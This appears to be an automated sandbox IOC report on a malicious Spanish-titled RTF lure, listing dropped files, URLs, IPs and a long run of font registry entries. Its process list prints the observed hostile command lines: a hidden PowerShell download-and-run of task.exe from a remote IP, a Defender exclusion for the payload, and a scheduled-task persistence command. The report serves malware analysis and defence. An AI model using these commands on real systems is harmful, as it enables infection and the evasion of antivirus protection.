IOC Report

loading gif

Files

File Path
Type
Category
Malicious
PAGO DEL SALDO.doc
Rich Text Format data, unknown version
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
downloaded
 malicious
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
XML 1.0 document, ASCII text
dropped
 malicious
C:\Users\user\AppData\Roaming\SzfukVRF.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\task.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2CAE3F9.wmf
Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD7EADD8.png
370 sysV pure executable
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4D8A2392-564C-4DB2-903D-17A8A736109B}.tmp
data
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{527B5D4D-3E6F-42BD-8FFA-6C52D5EDBEDF}.tmp
data
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{88FEB9FD-DBED-46CA-AEE6-1702A6B1006D}.tmp
data
dropped
 clean
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PAGO DEL SALDO.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:21:13 2021, length=393199, window=hide
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Little-endian UTF-16 Unicode text, with no line terminators
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0VT7C41M2L4V6JEPSUND.temp
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\35BY7DRSER1V8J9JMCO9.temp
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CS0OLG9QFDF935YIQMNF.temp
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X87RSB2KVTP8BHZRK5J6.temp
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
data
dropped
 clean
C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Chrome\Default\Cookies
SQLite 3.x database, last written using SQLite version 3032001
dropped
 clean
C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Firefox\Profiles\7xwghk55.default\cookies.sqlite
SQLite 3.x database, user version 7, last written using SQLite version 3017000
dropped
 clean
C:\Users\user\Desktop\~$GO DEL SALDO.doc
data
dropped
 clean
There are 17 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
malicious
C:\Users\user\AppData\Roaming\task.exe
"C:\Users\user\AppData\Roaming\task.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
 malicious
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
 malicious
C:\Users\user\AppData\Roaming\task.exe
C:\Users\user\AppData\Roaming\task.exe
 malicious
C:\Windows\System32\notepad.exe
C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
 malicious
C:\Windows\System32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
clean

URLs

Name
IP
Malicious
httP://173.232.2
unknown
 malicious
httP://173.232.204.89/t
unknown
 malicious
httP://173.232
unknown
 malicious
http://173.232.204.89/task.exe
173.232.204.89
 malicious
httP://173.232.204.89/task.ex
unknown
 malicious
httP://173.232.204.89/task.exe
unknown
 malicious
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
unknown
 clean
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
 clean
http://java.lp
unknown
 clean
http://173.232.204.89
unknown
 clean
httP://173.232.204.89/task.exePE
unknown
 clean
http://www.piriform.com/ccleaner
unknown
 clean
http://www.%s.comPA
unknown
 clean
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
 clean
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
unknown
 clean
There are 5 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
us2.smtp.mailhostbox.com
208.91.198.143
 clean

IPs

IP
Domain
Country
Malicious
208.91.199.224
unknown
United States
malicious
173.232.204.89
unknown
United States
malicious
208.91.198.143
us2.smtp.mailhostbox.com
United States
clean

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
hh%
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
?i%
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
ak%
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-2000
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
GraphicsFiltersPNGFilesIntl_1033
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2F392
2F392
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
 clean
